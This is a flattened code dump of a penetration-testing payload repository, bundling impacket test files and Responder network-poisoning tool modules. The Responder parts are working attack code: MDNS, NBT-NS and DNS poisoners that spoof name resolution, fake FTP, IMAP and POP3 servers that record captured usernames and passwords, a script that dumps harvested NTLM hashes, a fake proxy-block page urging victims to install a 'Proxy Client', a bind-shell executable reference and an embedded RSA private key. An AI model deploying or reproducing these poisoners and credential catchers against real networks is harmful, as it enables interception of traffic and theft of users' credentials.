[0x12,0x23,0x4d,0x09,0x86,0x34]) 63 | 64 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11FrameControlRTS) 65 | unittest.TextTestRunner(verbosity=2).run(suite) 66 | 67 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_helper.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Copyright (c) 2003-2013 CORE Security Technologies 4 | # 5 | # This software is provided under under a slightly modified version 6 | # of the Apache Software License. See the accompanying LICENSE file 7 | # for more information. 8 | # 9 | # $Id$ 10 | # 11 | # Description: 12 | # Tests for helper used to build ProtocolPackets 13 | # 14 | # Author: 15 | # Aureliano Calvo 16 | 17 | # sorry, this is very ugly, but I'm in python 2.5 18 | import sys 19 | sys.path.insert(0,"../../..") 20 | 21 | 22 | import unittest 23 | import impacket.helper as h 24 | 25 | 26 | 27 | class TestHelpers(unittest.TestCase): 28 | 29 | def test_well_formed(self): 30 | class MockPacket(h.ProtocolPacket): 31 | byte_field = h.Byte(0) 32 | word_field = h.Word(1, ">") 33 | three_bytes_field = h.ThreeBytesBigEndian(3) 34 | long_field = h.Long(6, ">") 35 | aliased_bit_field = h.Bit(0,0) 36 | 37 | header_size = 4 38 | tail_size = 0 39 | 40 | p = MockPacket() 41 | p.byte_field = 1 42 | p.word_field = 2 43 | p.three_bytes_field = 4 44 | p.long_field = 8 45 | 46 | self.assertEqual(1, p.byte_field) 47 | self.assertEqual(2, p.word_field) 48 | self.assertEqual(4, p.three_bytes_field) 49 | self.assertEqual(8, p.long_field) 50 | 51 | self.assertEqual(True, p.aliased_bit_field) 52 | 53 | p.aliased_bit_field = False 54 | 55 | self.assertEqual(0, p.byte_field) 56 | 57 | self.assertEqual(p.get_packet(), MockPacket(p.get_packet()).get_packet()) # it is the same packet after reprocessing. 58 | 59 | 60 | suite = unittest.TestLoader().loadTestsFromTestCase(TestHelpers) 61 | unittest.TextTestRunner(verbosity=2).run(suite) -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_wps.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Copyright (c) 2003-2013 CORE Security Technologies 4 | # 5 | # This software is provided under under a slightly modified version 6 | # of the Apache Software License. See the accompanying LICENSE file 7 | # for more information. 8 | # 9 | # $Id$ 10 | # 11 | # Description: 12 | # Tests for WPS packets 13 | # 14 | # Author: 15 | # Aureliano Calvo 16 | 17 | 18 | # sorry, this is very ugly, but I'm in python 2.5 19 | import sys 20 | sys.path.insert(0,"../../..") 21 | 22 | 23 | import unittest 24 | from impacket import wps 25 | import array 26 | 27 | 28 | class TestTLVContainer(unittest.TestCase): 29 | 30 | def testNormalUsageContainer(self): 31 | BUILDERS={ 32 | 1: wps.StringBuilder(), 33 | 2: wps.ByteBuilder(), 34 | 3: wps.NumBuilder(2) 35 | } 36 | tlvc = wps.TLVContainer(builders=BUILDERS) 37 | 38 | KINDS_N_VALUES = ( 39 | (1, "Sarlanga"), 40 | (2, 1), 41 | (3, 1024), 42 | (4, array.array("B", [1,2,3])) 43 | ) 44 | for k,v in KINDS_N_VALUES: 45 | tlvc.append(k,v) 46 | 47 | tlvc2 = wps.TLVContainer(builders=BUILDERS) 48 | tlvc2.from_ary(tlvc.to_ary()) 49 | 50 | for k,v in KINDS_N_VALUES: 51 | self.assertEqual(v, tlvc2.first(k)) 52 | 53 | self.assertEqual(tlvc.to_ary(), tlvc2.to_ary()) 54 | self.assertEquals("Sarlanga", tlvc.first(1)) 55 | 56 | suite = unittest.TestLoader().loadTestsFromTestCase(TestTLVContainer) 57 | unittest.TextTestRunner(verbosity=2).run(suite) -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/uuid.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2003-2016 CORE Security Technologies 2 | # 3 | # This software is provided under under a slightly modified version 4 | # of the Apache Software License. See the accompanying LICENSE file 5 | # for more information. 6 | # 7 | # Description: 8 | # Generate UUID compliant with http://www.webdav.org/specs/draft-leach-uuids-guids-01.txt. 9 | # A different, much simpler (not necessarily better) algorithm is used. 10 | # 11 | # Author: 12 | # Javier Kohen (jkohen) 13 | # 14 | 15 | import re 16 | 17 | from random import randrange 18 | from struct import pack, unpack 19 | 20 | def generate(): 21 | # UHm... crappy Python has an maximum integer of 2**31-1. 22 | top = (1L<<31)-1 23 | return pack("IIII", randrange(top), randrange(top), randrange(top), randrange(top)) 24 | 25 | def bin_to_string(uuid): 26 | uuid1, uuid2, uuid3 = unpack('HHL', uuid[8:16]) 28 | return '%08X-%04X-%04X-%04X-%04X%08X' % (uuid1, uuid2, uuid3, uuid4, uuid5, uuid6) 29 | 30 | def string_to_bin(uuid): 31 | matches = re.match('([\dA-Fa-f]{8})-([\dA-Fa-f]{4})-([\dA-Fa-f]{4})-([\dA-Fa-f]{4})-([\dA-Fa-f]{4})([\dA-Fa-f]{8})', uuid) 32 | (uuid1, uuid2, uuid3, uuid4, uuid5, uuid6) = map(lambda x: long(x, 16), matches.groups()) 33 | uuid = pack('HHL', uuid4, uuid5, uuid6) 35 | return uuid 36 | 37 | def stringver_to_bin(s): 38 | (maj,min) = s.split('.') 39 | return pack('=2.6)', 'pyasn1 (>=0.1.8)'], 29 | ) 30 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/.gitignore: -------------------------------------------------------------------------------- 1 | # Responder logs 2 | *.db 3 | *.txt 4 | *.log 5 | 6 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/DumpHash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | import sqlite3 18 | 19 | def DumpHashToFile(outfile, data): 20 | with open(outfile,"w") as dump: 21 | dump.write(data) 22 | 23 | def DbConnect(): 24 | cursor = sqlite3.connect("./Responder.db") 25 | return cursor 26 | 27 | def GetResponderCompleteNTLMv2Hash(cursor): 28 | res = cursor.execute("SELECT fullhash FROM Responder WHERE type LIKE '%v2%' AND UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)") 29 | Output = "" 30 | for row in res.fetchall(): 31 | Output += '{0}'.format(row[0])+'\n' 32 | return Output 33 | 34 | def GetResponderCompleteNTLMv1Hash(cursor): 35 | res = cursor.execute("SELECT fullhash FROM Responder WHERE type LIKE '%v1%' AND UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)") 36 | Output = "" 37 | for row in res.fetchall(): 38 | Output += '{0}'.format(row[0])+'\n' 39 | return Output 40 | 41 | cursor = DbConnect() 42 | print "Dumping NTLMV2 hashes:" 43 | v2 = GetResponderCompleteNTLMv2Hash(cursor) 44 | DumpHashToFile("DumpNTLMv2.txt", v2) 45 | print v2 46 | print "\nDumping NTLMv1 hashes:" 47 | v1 = GetResponderCompleteNTLMv1Hash(cursor) 48 | DumpHashToFile("DumpNTLMv1.txt", v1) 49 | print v1 50 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/certs/gen-self-signed-cert.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | openssl genrsa -out responder.key 2048 3 | openssl req -new -x509 -days 3650 -key responder.key -out responder.crt -subj "/" 4 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/certs/responder.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIC0zCCAbugAwIBAgIJAOQijexo77F4MA0GCSqGSIb3DQEBBQUAMAAwHhcNMTUw 3 | NjI5MDU1MTUyWhcNMjUwNjI2MDU1MTUyWjAAMIIBIjANBgkqhkiG9w0BAQEFAAOC 4 | AQ8AMIIBCgKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k 5 | sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP 6 | 2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC 7 | 6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg 8 | WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF 9 | N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABo1AwTjAdBgNVHQ4EFgQU 10 | YY2ttc/bjfXwGqPvNUSm6Swg4VYwHwYDVR0jBBgwFoAUYY2ttc/bjfXwGqPvNUSm 11 | 6Swg4VYwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOCAQEAXFN+oxRwyqU0 12 | YWTlixZl0NP6bWJ2W+dzmlqBxugEKYJCPxM0GD+WQDEd0Au4pnhyzt77L0sBgTF8 13 | koFbkdFsTyX2AHGik5orYyvQqS4jVkCMudBXNLt5iHQsSXIeaOQRtv7LYZJzh335 14 | 4431+r5MIlcxrRA2fhpOAT2ZyKW1TFkmeAMoH7/BTzGlre9AgCcnKBvvGdzJhCyw 15 | YlRGHrfR6HSkcoEeIV1u/fGU4RX7NO4ugD2wkOhUoGL1BS926WV02c5CugfeKUlW 16 | HM65lZEkTb+MQnLdpnpW8GRXhXbIrLMLd2pWW60wFhf6Ub/kGJ5bCUTnXYPRcA3v 17 | u0/CRCN/lg== 18 | -----END CERTIFICATE----- 19 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/certs/responder.key: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIIEowIBAAKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k 3 | sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP 4 | 2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC 5 | 6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg 6 | WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF 7 | N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABAoIBABuAkDTUj0nZpFLS 8 | 1RLvqoeamlcFsQ+QzyRkxzNYEimF1rp4rXiYJuuOmtULleogm+dpQsA9klaQyEwY 9 | kowTqG3ZO8kTFwIr9nOqiXENDX3FOGnchwwfaOz0XlNhncFm3e7MKA25T4UeI02U 10 | YBPS75NspHb3ltsVnqhYSYyv3w/Ml/mDz+D76dRgT6seLEOTkKwZj7icBR6GNO1R 11 | FLbffJNE6ZcXI0O892CTVUB4d3egcpSDuaAq3f/UoRB3xH7MlnEPfxE3y34wcp8i 12 | erqm/8uVeBOnQMG9FVGXBJXbjSjnWS27sj/vGm+0rc8c925Ed1QdIM4Cvk6rMOHQ 13 | IGkDnvECgYEA4e3B6wFtONysLhkG6Wf9lDHog35vE/Ymc695gwksK07brxPF1NRS 14 | nNr3G918q+CE/0tBHqyl1i8SQ/f3Ejo7eLsfpAGwR9kbD9hw2ViYvEio9dAIMVTL 15 | LzJoSDLwcPCtEOpasl0xzyXrTBzWuNYTlfvGkyd2mutynORRIZPhgHkCgYEA00Q9 16 | cHBkoBOIHF8XHV3pm0qfwuE13BjKSwKIrNyKssGf8sY6bFGhLSpTLjWEMN/7B+S1 17 | 5IC0apiGjHNK6Z51kjKhEmSzCg8rXyULOalsyo2hNsMA+Lt1g72zJIDIT/+YeKAf 18 | s85G6VgMtNLozNjx7C1eMugECJ+rrpRVpIe1kJcCgYAr+I0cQtvSDEjKc/5/YMje 19 | ldQN+4Z82RRkwYshsKBTEXb6HRwMrwIhGxCq8LF59imMUkYrRSjFhcXFSrZgasr2 20 | VVz0G4wGf7+flt1nv7GCO5X+uW1OxJUC64mWO6vGH2FfgG0Ed9Tg3x1rY9V6hdes 21 | AiOEslKIFjjpRhpwMYra6QKBgQDLFO/SY9f2oI/YZff8PMhQhL1qQb7aYeIjlL35 22 | HM8e4k10u+RxN06t8d+frcXyjXvrrIjErIvBY/kCjdlXFQGDlbOL0MziQI66mQtf 23 | VGPFmbt8vpryfpCKIRJRZpInhFT2r0WKPCGiMQeV0qACOhDjrQC+ApXODF6mJOTm 24 | kaWQ5QKBgHE0pD2GAZwqlvKCM5YmBvDpebaBNwpvoY22e2jzyuQF6cmw85eAtp35 25 | f92PeuiYyaXuLgL2BR4HSYSjwggxh31JJnRccIxSamATrGOiWnIttDsCB5/WibOp 26 | MKuFj26d01imFixufclvZfJxbAvVy4H9hmyjgtycNY+Gp5/CLgDC 27 | -----END RSA PRIVATE KEY----- 28 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/files/AccessDenied.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | Website Blocked: ISA Proxy Server 4 | 14 | 15 | 16 | 17 |
18 |
19 |
New Security Policy: Website Blocked
20 |
    21 |
    22 |
    23 |
  • Access has been blocked. Please download and install the new Proxy Client in order to access internet resources.
    • 24 |
    25 |
26 |
27 |
ISA Security Proxy Server
28 |
29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/files/BindShell.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/demmsec/bashbunny-payloads/487eda17b7ebf9649fc6e7d393774850a0aef6a3/payloads/library/tools_installer/tools_to_install/responder/files/BindShell.exe -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/fingerprint.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | import socket 18 | import struct 19 | 20 | from utils import color 21 | from packets import SMBHeader, SMBNego, SMBNegoFingerData, SMBSessionFingerData 22 | 23 | def OsNameClientVersion(data): 24 | try: 25 | length = struct.unpack('i", len(''.join(Packet)))+Packet 44 | s.send(Buffer) 45 | data = s.recv(2048) 46 | 47 | if data[8:10] == "\x72\x00": 48 | Header = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00") 49 | Body = SMBSessionFingerData() 50 | Body.calculate() 51 | 52 | Packet = str(Header)+str(Body) 53 | Buffer = struct.pack(">i", len(''.join(Packet)))+Packet 54 | 55 | s.send(Buffer) 56 | data = s.recv(2048) 57 | 58 | if data[8:10] == "\x73\x16": 59 | return OsNameClientVersion(data) 60 | except: 61 | print color("[!] ", 1, 1) +" Fingerprint failed" 62 | return None 63 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/logs/.gitignore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/demmsec/bashbunny-payloads/487eda17b7ebf9649fc6e7d393774850a0aef6a3/payloads/library/tools_installer/tools_to_install/responder/logs/.gitignore -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/poisoners/MDNS.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | import struct 18 | 19 | from SocketServer import BaseRequestHandler 20 | from packets import MDNS_Ans 21 | from utils import * 22 | 23 | def Parse_MDNS_Name(data): 24 | try: 25 | data = data[12:] 26 | NameLen = struct.unpack('>B',data[0])[0] 27 | Name = data[1:1+NameLen] 28 | NameLen_ = struct.unpack('>B',data[1+NameLen])[0] 29 | Name_ = data[1+NameLen:1+NameLen+NameLen_+1] 30 | return Name+'.'+Name_ 31 | except IndexError: 32 | return None 33 | 34 | 35 | def Poisoned_MDNS_Name(data): 36 | data = data[12:] 37 | return data[:len(data)-5] 38 | 39 | class MDNS(BaseRequestHandler): 40 | def handle(self): 41 | MADDR = "224.0.0.251" 42 | MPORT = 5353 43 | 44 | data, soc = self.request 45 | Request_Name = Parse_MDNS_Name(data) 46 | 47 | # Break out if we don't want to respond to this host 48 | if (not Request_Name) or (RespondToThisHost(self.client_address[0], Request_Name) is not True): 49 | return None 50 | 51 | if settings.Config.AnalyzeMode: # Analyze Mode 52 | if Parse_IPV6_Addr(data): 53 | print text('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (color(self.client_address[0], 3), color(Request_Name, 3))) 54 | SavePoisonersToDb({ 55 | 'Poisoner': 'MDNS', 56 | 'SentToIp': self.client_address[0], 57 | 'ForName': Request_Name, 58 | 'AnalyzeMode': '1', 59 | }) 60 | else: # Poisoning Mode 61 | if Parse_IPV6_Addr(data): 62 | 63 | Poisoned_Name = Poisoned_MDNS_Name(data) 64 | Buffer = MDNS_Ans(AnswerName = Poisoned_Name, IP=RespondWithIPAton()) 65 | Buffer.calculate() 66 | soc.sendto(str(Buffer), (MADDR, MPORT)) 67 | 68 | print color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0], Request_Name), 2, 1) 69 | SavePoisonersToDb({ 70 | 'Poisoner': 'MDNS', 71 | 'SentToIp': self.client_address[0], 72 | 'ForName': Request_Name, 73 | 'AnalyzeMode': '0', 74 | }) 75 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/poisoners/NBTNS.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | import fingerprint 18 | 19 | from packets import NBT_Ans 20 | from SocketServer import BaseRequestHandler 21 | from utils import * 22 | 23 | # Define what are we answering to. 24 | def Validate_NBT_NS(data): 25 | if settings.Config.AnalyzeMode: 26 | return False 27 | elif NBT_NS_Role(data[43:46]) == "File Server": 28 | return True 29 | elif settings.Config.NBTNSDomain: 30 | if NBT_NS_Role(data[43:46]) == "Domain Controller": 31 | return True 32 | elif settings.Config.Wredirect: 33 | if NBT_NS_Role(data[43:46]) == "Workstation/Redirector": 34 | return True 35 | return False 36 | 37 | # NBT_NS Server class. 38 | class NBTNS(BaseRequestHandler): 39 | 40 | def handle(self): 41 | 42 | data, socket = self.request 43 | Name = Decode_Name(data[13:45]) 44 | 45 | # Break out if we don't want to respond to this host 46 | if RespondToThisHost(self.client_address[0], Name) is not True: 47 | return None 48 | 49 | if data[2:4] == "\x01\x10": 50 | Finger = None 51 | if settings.Config.Finger_On_Off: 52 | Finger = fingerprint.RunSmbFinger((self.client_address[0],445)) 53 | 54 | if settings.Config.AnalyzeMode: # Analyze Mode 55 | LineHeader = "[Analyze mode: NBT-NS]" 56 | print color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1) 57 | SavePoisonersToDb({ 58 | 'Poisoner': 'NBT-NS', 59 | 'SentToIp': self.client_address[0], 60 | 'ForName': Name, 61 | 'AnalyzeMode': '1', 62 | }) 63 | else: # Poisoning Mode 64 | Buffer = NBT_Ans() 65 | Buffer.calculate(data) 66 | socket.sendto(str(Buffer), self.client_address) 67 | LineHeader = "[*] [NBT-NS]" 68 | 69 | print color("%s Poisoned answer sent to %s for name %s (service: %s)" % (LineHeader, self.client_address[0], Name, NBT_NS_Role(data[43:46])), 2, 1) 70 | 71 | SavePoisonersToDb({ 72 | 'Poisoner': 'NBT-NS', 73 | 'SentToIp': self.client_address[0], 74 | 'ForName': Name, 75 | 'AnalyzeMode': '0', 76 | }) 77 | 78 | if Finger is not None: 79 | print text("[FINGER] OS Version : %s" % color(Finger[0], 3)) 80 | print text("[FINGER] Client Version : %s" % color(Finger[1], 3)) 81 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/poisoners/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/demmsec/bashbunny-payloads/487eda17b7ebf9649fc6e7d393774850a0aef6a3/payloads/library/tools_installer/tools_to_install/responder/poisoners/__init__.py -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/servers/DNS.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | from packets import DNS_Ans 18 | from SocketServer import BaseRequestHandler 19 | from utils import * 20 | 21 | def ParseDNSType(data): 22 | QueryTypeClass = data[len(data)-4:] 23 | 24 | # If Type A, Class IN, then answer. 25 | return QueryTypeClass == "\x00\x01\x00\x01" 26 | 27 | 28 | 29 | class DNS(BaseRequestHandler): 30 | def handle(self): 31 | # Break out if we don't want to respond to this host 32 | if RespondToThisIP(self.client_address[0]) is not True: 33 | return None 34 | 35 | try: 36 | data, soc = self.request 37 | 38 | if ParseDNSType(data) and settings.Config.AnalyzeMode == False: 39 | buff = DNS_Ans() 40 | buff.calculate(data) 41 | soc.sendto(str(buff), self.client_address) 42 | 43 | ResolveName = re.sub(r'[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) 44 | print color("[*] [DNS] Poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0], ResolveName), 2, 1) 45 | 46 | except Exception: 47 | pass 48 | 49 | # DNS Server TCP Class 50 | class DNSTCP(BaseRequestHandler): 51 | def handle(self): 52 | # Break out if we don't want to respond to this host 53 | if RespondToThisIP(self.client_address[0]) is not True: 54 | return None 55 | 56 | try: 57 | data = self.request.recv(1024) 58 | 59 | if ParseDNSType(data) and settings.Config.AnalyzeMode is False: 60 | buff = DNS_Ans() 61 | buff.calculate(data) 62 | self.request.send(str(buff)) 63 | 64 | ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) 65 | print color("[*] [DNS-TCP] Poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0], ResolveName), 2, 1) 66 | 67 | except Exception: 68 | pass 69 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/servers/FTP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | from utils import * 18 | from SocketServer import BaseRequestHandler 19 | from packets import FTPPacket 20 | 21 | class FTP(BaseRequestHandler): 22 | def handle(self): 23 | try: 24 | self.request.send(str(FTPPacket())) 25 | data = self.request.recv(1024) 26 | 27 | if data[0:4] == "USER": 28 | User = data[5:].strip() 29 | 30 | Packet = FTPPacket(Code="331",Message="User name okay, need password.") 31 | self.request.send(str(Packet)) 32 | data = self.request.recv(1024) 33 | 34 | if data[0:4] == "PASS": 35 | Pass = data[5:].strip() 36 | 37 | Packet = FTPPacket(Code="530",Message="User not logged in.") 38 | self.request.send(str(Packet)) 39 | data = self.request.recv(1024) 40 | 41 | SaveToDb({ 42 | 'module': 'FTP', 43 | 'type': 'Cleartext', 44 | 'client': self.client_address[0], 45 | 'user': User, 46 | 'cleartext': Pass, 47 | 'fullhash': User + ':' + Pass 48 | }) 49 | 50 | else: 51 | Packet = FTPPacket(Code="502",Message="Command not implemented.") 52 | self.request.send(str(Packet)) 53 | data = self.request.recv(1024) 54 | 55 | except Exception: 56 | pass 57 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/servers/IMAP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | from utils import * 18 | from SocketServer import BaseRequestHandler 19 | from packets import IMAPGreeting, IMAPCapability, IMAPCapabilityEnd 20 | 21 | class IMAP(BaseRequestHandler): 22 | def handle(self): 23 | try: 24 | self.request.send(str(IMAPGreeting())) 25 | data = self.request.recv(1024) 26 | 27 | if data[5:15] == "CAPABILITY": 28 | RequestTag = data[0:4] 29 | self.request.send(str(IMAPCapability())) 30 | self.request.send(str(IMAPCapabilityEnd(Tag=RequestTag))) 31 | data = self.request.recv(1024) 32 | 33 | if data[5:10] == "LOGIN": 34 | Credentials = data[10:].strip() 35 | 36 | SaveToDb({ 37 | 'module': 'IMAP', 38 | 'type': 'Cleartext', 39 | 'client': self.client_address[0], 40 | 'user': Credentials[0], 41 | 'cleartext': Credentials[1], 42 | 'fullhash': Credentials[0]+":"+Credentials[1], 43 | }) 44 | 45 | ## FIXME: Close connection properly 46 | ## self.request.send(str(ditchthisconnection())) 47 | ## data = self.request.recv(1024) 48 | except Exception: 49 | pass 50 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/servers/POP3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | from utils import * 18 | from SocketServer import BaseRequestHandler 19 | from packets import POPOKPacket 20 | 21 | # POP3 Server class 22 | class POP3(BaseRequestHandler): 23 | def SendPacketAndRead(self): 24 | Packet = POPOKPacket() 25 | self.request.send(str(Packet)) 26 | return self.request.recv(1024) 27 | 28 | def handle(self): 29 | try: 30 | data = self.SendPacketAndRead() 31 | 32 | if data[0:4] == "USER": 33 | User = data[5:].replace("\r\n","") 34 | data = self.SendPacketAndRead() 35 | if data[0:4] == "PASS": 36 | Pass = data[5:].replace("\r\n","") 37 | 38 | SaveToDb({ 39 | 'module': 'POP3', 40 | 'type': 'Cleartext', 41 | 'client': self.client_address[0], 42 | 'user': User, 43 | 'cleartext': Pass, 44 | 'fullhash': User+":"+Pass, 45 | }) 46 | self.SendPacketAndRead() 47 | except Exception: 48 | pass 49 | -------------------------------------------------------------------------------- 